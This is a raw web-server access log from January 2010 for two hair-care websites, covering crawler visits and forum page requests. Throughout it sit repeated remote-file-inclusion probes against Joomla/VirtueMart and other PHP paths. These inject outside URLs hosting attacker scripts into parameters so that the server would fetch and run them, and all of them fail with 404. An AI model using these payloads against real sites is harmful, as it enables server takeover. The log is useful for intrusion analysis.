82.77.23.23 - - [12/Jan/2010:15:55:26 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.83.241.105 - - [12/Jan/2010:15:55:55 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.83.241.105 - - [12/Jan/2010:15:55:55 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
203.83.241.105 - - [12/Jan/2010:15:55:55 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.223.1.42 - - [12/Jan/2010:15:59:50 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.223.1.42 - - [12/Jan/2010:15:59:50 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.223.1.42 - - [12/Jan/2010:15:59:50 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.77.23.23 - - [12/Jan/2010:16:00:14 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.77.23.23 - - [12/Jan/2010:16:00:14 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
82.77.23.23 - - [12/Jan/2010:16:00:14 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
93.174.93.141 - - [12/Jan/2010:16:01:17 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "growlonghairfast.com"
93.174.93.141 - - [12/Jan/2010:16:01:17 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4" "growlonghairfast.com"
124.115.1.7 - - [12/Jan/2010:16:01:57 -0800] "GET /freehairsecretsphp/viewtopic.php?p=12589 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
58.61.164.139 - - [12/Jan/2010:16:02:01 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:16:04:36 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:16:04:36 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.115.173.228 - - [12/Jan/2010:16:04:36 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:16:05:00 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:16:05:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:16:05:00 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:16:05:51 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:16:05:51 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:16:05:51 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.61.164.140 - - [12/Jan/2010:16:13:23 -0800] "GET /freehairsecretsphp/viewtopic.php?p=9348 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
124.115.1.8 - - [12/Jan/2010:16:16:24 -0800] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
58.61.164.39 - - [12/Jan/2010:16:17:07 -0800] "GET /freehairsecretsphp/viewtopic.php?p=19121 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
77.88.25.28 - - [12/Jan/2010:16:21:21 -0800] "GET /tmp/mailError.log HTTP/1.1" 200 62167 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
213.219.160.38 - - [12/Jan/2010:16:21:44 -0800] "GET /logs/access.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.219.160.38 - - [12/Jan/2010:16:21:50 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
213.219.160.38 - - [12/Jan/2010:16:21:50 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.mcdnit.com.br/imagens1/fx29sh/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
200.54.154.10 - - [12/Jan/2010:16:23:55 -0800] "GET /logs/access.log//include/write.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
200.54.154.10 - - [12/Jan/2010:16:23:55 -0800] "GET /include/write.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
200.54.154.10 - - [12/Jan/2010:16:23:55 -0800] "GET /logs//include/write.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
194.8.75.50 - - [12/Jan/2010:16:25:19 -0800] "GET /freehairsecretsphp/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/posting.php?mode=newtopic&f=1" "Mozilla/2.0 (compatible; MSIE 3.02; Windows CE; 240x320)" "growlonghairfast.com"
58.61.164.39 - - [12/Jan/2010:16:25:55 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14259 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
200.54.154.10 - - [12/Jan/2010:16:25:56 -0800] "GET /logs/access.log//include/write.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
200.54.154.10 - - [12/Jan/2010:16:25:56 -0800] "GET /include/write.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
200.54.154.10 - - [12/Jan/2010:16:25:56 -0800] "GET /logs//include/write.php?dir=http://crocifissonegro.hellospace.net/A51/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
65.55.51.10 - - [12/Jan/2010:16:35:43 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "growlonghairfast.com"
65.55.51.10 - - [12/Jan/2010:16:35:44 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14086 HTTP/1.1" 200 349 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "growlonghairfast.com"
125.141.91.138 - - [12/Jan/2010:16:40:33 -0800] "GET /index.php?_REQUEST=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [12/Jan/2010:16:40:33 -0800] "GET /logs//index.php?_REQUEST=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [12/Jan/2010:16:40:33 -0800] "GET /logs/access.log//index.php?_REQUEST=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.61.164.40 - - [12/Jan/2010:16:46:03 -0800] "GET /freehairsecretsphp/viewtopic.php?p=949 HTTP/1.1" 200 349 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:16:46:43 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:16:46:47 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:16:46:47 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.115.111.248 - - [12/Jan/2010:16:47:20 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
65.23.156.168 - - [12/Jan/2010:16:48:12 -0800] "GET /logs/access_091005.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:17:03:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:17:03:12 -0800] "GET /logs/access_091005.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:17:03:12 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
65.23.156.168 - - [12/Jan/2010:17:05:38 -0800] "GET /logs/access_091005.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
124.115.6.13 - - [12/Jan/2010:17:06:00 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:17:10:06 -0800] "GET /freehairsecretsphp/viewtopic.php?p=1194 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:17:10:10 -0800] "GET /freehairsecretsphp/viewtopic.php?p=12130 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:17:10:16 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14427 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:17:10:25 -0800] "GET /freehairsecretsphp/viewtopic.php?p=19780 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:17:10:31 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6085 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:17:10:36 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6110 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:17:10:41 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6205 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:17:10:46 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6522 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:17:10:51 -0800] "GET /freehairsecretsphp/viewtopic.php?p=7697 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jan/2010:17:10:56 -0800] "GET /freehairsecretsphp/viewtopic.php?p=8228 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
125.141.91.138 - - [12/Jan/2010:17:12:27 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [12/Jan/2010:17:12:27 -0800] "GET /logs/access.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
125.141.91.138 - - [12/Jan/2010:17:12:27 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.115.155 - - [12/Jan/2010:17:18:31 -0800] "GET /tmp/ HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "freehairsecrets.com"
220.181.94.213 - - [12/Jan/2010:17:33:00 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
220.181.94.213 - - [12/Jan/2010:17:33:44 -0800] "GET /freehairsecretsphp/viewtopic.php?p=20897 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
66.249.65.117 - - [12/Jan/2010:17:43:44 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
195.2.240.202 - - [12/Jan/2010:17:45:55 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "growlonghairfast.com"
195.2.240.202 - - [12/Jan/2010:17:45:56 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.61 [en] (X11; U; ) - BrowseX (2.0.0 Windows)" "growlonghairfast.com"
194.8.75.157 - - [12/Jan/2010:17:56:53 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC" "growlonghairfast.com"
194.8.75.157 - - [12/Jan/2010:17:56:54 -0800] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC" "growlonghairfast.com"
195.2.240.202 - - [12/Jan/2010:17:59:37 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Opera/9.00 (Windows NT 5.1; U; en)" "freehairsecrets.com"
195.2.240.202 - - [12/Jan/2010:17:59:37 -0800] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Opera/9.00 (Windows NT 5.1; U; en)" "freehairsecrets.com"
220.181.7.32 - - [12/Jan/2010:17:59:40 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
77.88.25.28 - - [12/Jan/2010:18:01:28 -0800] "GET /logs/access_090629.log HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
64.62.128.254 - - [12/Jan/2010:18:25:40 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.62.128.254 - - [12/Jan/2010:18:25:40 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.62.128.254 - - [12/Jan/2010:18:25:40 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.62.128.254 - - [12/Jan/2010:18:26:03 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.62.128.254 - - [12/Jan/2010:18:26:03 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.62.128.254 - - [12/Jan/2010:18:26:03 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:18:27:08 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:18:27:12 -0800] "GET /freehairsecretsphp/viewtopic.php?p=14487 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:18:27:27 -0800] "GET /freehairsecretsphp/viewtopic.php?p=8757 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:18:27:31 -0800] "GET /freehairsecretsphp/viewtopic.php?p=13124 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:18:27:33 -0800] "GET /freehairsecretsphp/viewtopic.php?p=12812 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:18:27:36 -0800] "GET /freehairsecretsphp/viewtopic.php?p=12545 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
194.8.75.157 - - [12/Jan/2010:18:29:42 -0800] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.freehairsecrets.com"
194.8.75.157 - - [12/Jan/2010:18:29:42 -0800] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)" "www.freehairsecrets.com"
64.62.128.254 - - [12/Jan/2010:18:30:22 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
193.47.80.39 - - [12/Jan/2010:18:30:44 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "freehairsecrets.com"
193.47.80.39 - - [12/Jan/2010:18:30:45 -0800] "GET /logs/?N=D HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "freehairsecrets.com"
64.62.128.254 - - [12/Jan/2010:18:30:53 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:18:32:21 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:18:32:23 -0800] "GET /freehairsecretsphp/viewtopic.php?p=15606 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:18:38:39 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:18:38:40 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6479 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
193.47.80.39 - - [12/Jan/2010:18:45:40 -0800] "GET /logs/?N=A HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "freehairsecrets.com"
193.47.80.39 - - [12/Jan/2010:18:45:42 -0800] "GET /logs/?M=A HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "freehairsecrets.com"
193.47.80.39 - - [12/Jan/2010:18:45:45 -0800] "GET /logs/?D=A HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:18:57:13 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:18:57:16 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6719 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
119.63.198.10 - - [12/Jan/2010:19:01:29 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
38.101.148.126 - - [12/Jan/2010:19:08:38 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
38.101.148.126 - - [12/Jan/2010:19:08:41 -0800] "GET /freehairsecretsphp/viewtopic.php?p=6522 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "growlonghairfast.com"
